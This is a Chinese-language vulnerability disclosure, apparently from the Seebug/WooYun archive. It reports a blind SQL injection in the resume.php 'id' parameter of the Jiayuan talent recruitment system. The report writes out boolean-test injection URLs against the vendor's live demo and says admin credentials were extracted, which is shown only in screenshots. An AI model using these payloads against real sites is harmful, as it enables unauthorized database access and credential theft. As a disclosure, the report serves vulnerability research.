VULHUB ™

### 简要描述： 嘉缘人才系统1处SQL注入. 官网DEMO测试。 ### 详细说明： 嘉缘人才系统触屏版demo: ``` http://m.rccms.com/person/resume.php?id=696 ``` 参数id可以盲注。 ``` http://m.rccms.com/person/resume.php?id=696%20and ``` 会报告SQL错误。 [<img src="https://images.seebug.org/upload/201411/19210240e8f7ce481e873ad068ecd04c5cc6082b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19210240e8f7ce481e873ad068ecd04c5cc6082b.png) ``` http://m.rccms.com/person/resume.php?id=696%20and%201=1 ``` 可以正常显示。 [<img src="https://images.seebug.org/upload/201411/192102515a77ace993c59cd1820b40036b88622d.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/192102515a77ace993c59cd1820b40036b88622d.png) ``` http://m.rccms.com/person/resume.php?id=696%20and%201=0 ``` 显示参数错误。 [<img src="https://images.seebug.org/upload/201411/192103013b5f7dd47270178fceed0c50f5c8de81.png" alt="4.png" width="600"...

### 简要描述： 嘉缘人才系统1处SQL注入. 官网DEMO测试。 ### 详细说明： 嘉缘人才系统触屏版demo: ``` http://m.rccms.com/person/resume.php?id=696 ``` 参数id可以盲注。 ``` http://m.rccms.com/person/resume.php?id=696%20and ``` 会报告SQL错误。 [<img src="https://images.seebug.org/upload/201411/19210240e8f7ce481e873ad068ecd04c5cc6082b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19210240e8f7ce481e873ad068ecd04c5cc6082b.png) ``` http://m.rccms.com/person/resume.php?id=696%20and%201=1 ``` 可以正常显示。 [<img src="https://images.seebug.org/upload/201411/192102515a77ace993c59cd1820b40036b88622d.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/192102515a77ace993c59cd1820b40036b88622d.png) ``` http://m.rccms.com/person/resume.php?id=696%20and%201=0 ``` 显示参数错误。 [<img src="https://images.seebug.org/upload/201411/192103013b5f7dd47270178fceed0c50f5c8de81.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/192103013b5f7dd47270178fceed0c50f5c8de81.png) 以下为使用测试程序获取的管理员账号和密码信息： [<img src="https://images.seebug.org/upload/201411/19210430579418af07ce582cbaa074b79c98d1a6.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19210430579418af07ce582cbaa074b79c98d1a6.png) [<img src="https://images.seebug.org/upload/201411/19210439ae51098fc818a8b039fc30a51c9fcc32.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19210439ae51098fc818a8b039fc30a51c9fcc32.png) [<img src="https://images.seebug.org/upload/201411/1921044797ef2d7df57fa82ab2aec7f7aac39204.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1921044797ef2d7df57fa82ab2aec7f7aac39204.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201411/19210240e8f7ce481e873ad068ecd04c5cc6082b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19210240e8f7ce481e873ad068ecd04c5cc6082b.png) [<img src="https://images.seebug.org/upload/201411/19210430579418af07ce582cbaa074b79c98d1a6.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19210430579418af07ce582cbaa074b79c98d1a6.png) [<img src="https://images.seebug.org/upload/201411/19210439ae51098fc818a8b039fc30a51c9fcc32.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19210439ae51098fc818a8b039fc30a51c9fcc32.png) [<img src="https://images.seebug.org/upload/201411/1921044797ef2d7df57fa82ab2aec7f7aac39204.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1921044797ef2d7df57fa82ab2aec7f7aac39204.png)